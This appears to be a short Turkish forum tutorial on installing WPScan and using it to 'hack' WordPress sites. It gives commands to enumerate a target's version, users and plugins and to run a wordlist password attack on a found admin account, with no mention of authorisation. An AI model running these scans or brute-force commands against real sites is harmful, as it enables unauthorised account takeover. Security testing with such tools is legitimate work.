WPScan nedir?
*WPScan bizim Wordpress uyumlu siteleri hacklememize yarayan bir tooldur.
*Öncelikle belirteyim bunu kullanmak için sisteminizde RUBY dilini okuya bilmesi mümkün olmalıdır.
*Eğer Ruby sizin sisteminizde yoksa üzülmeyin bununda kurulumunu göstericem.
*WPScan bizim Wordpress uyumlu siteleri hacklememize yarayan bir tooldur.
*Öncelikle belirteyim bunu kullanmak için sisteminizde RUBY dilini okuya bilmesi mümkün olmalıdır.
*Eğer Ruby sizin sisteminizde yoksa üzülmeyin bununda kurulumunu göstericem.
Revealed content
WPScan indirmek için öncelikle bir takım komutları kullanmalıyız.
Komutlar her iki işletim sisteminde aynıdır.
apt install git
git clone https://github.com/wpscanteam/wpscan
Telefona kurmak için Termux programını indirmelisiniz.PC için KaliLinux işletim sistemi gereklidir.
Termux linki -
apt install git
git clone https://github.com/wpscanteam/wpscan
Revealed content
Kurulumu bitirdik.Şimdi kullanımına geçelim.
Wordpress uyumlu bir site bulduk diyelimki ornek.com bizim hedefimizİlk komutumuz wpscan -u ornek.com
Bu komut ile sistemde açıkları taramaya başlayacağız
–enumerate komutu Enumeration açılımı vermekdedir.
u Sistemde olan kullanıcıları tespit eder
v Versiyonu tespit eder
p Pluginsleri ortaya çıkarır
wpscan -u ornek.com –enumerate v Bu Komutla sitenin Wordpressin kaçıncı sürümünü kullandığını öğrene biliriz.
Aynısı olarak –enumerate u –enumerate p yazarak sistemde farklı bilgileri ele geçire bilirsiniz.
Mesela wpscan -u ornek.com –enumerate u komutunu kullandık.
Sonuç bu çıkdı diyelim
[+] Enumerating usernames …
[+] Identified the following 1 user/s:
+—-+——-+——————+
| Id | Login | Name |
+—-+——-+——————+
| 1 | BYADMİN | Bu bir örnekdir |
+—-+——-+——————+
[!] Default first WordPress username byadmin’ is still used
[+] Finished: Wed May 6 07:23:10 2020
Şifreyi bulmak için WordList atağıda gerçekleştire bilirsiniz
wpscan -u site.com –wordlist /root/Desktop/WPScan/sifreler.txt –username BYADMIN
Güçlü bir wordlistiniz varsa kırma ihtimaliniz büyükdür.
Bu içeriği görmek için giriş yapın.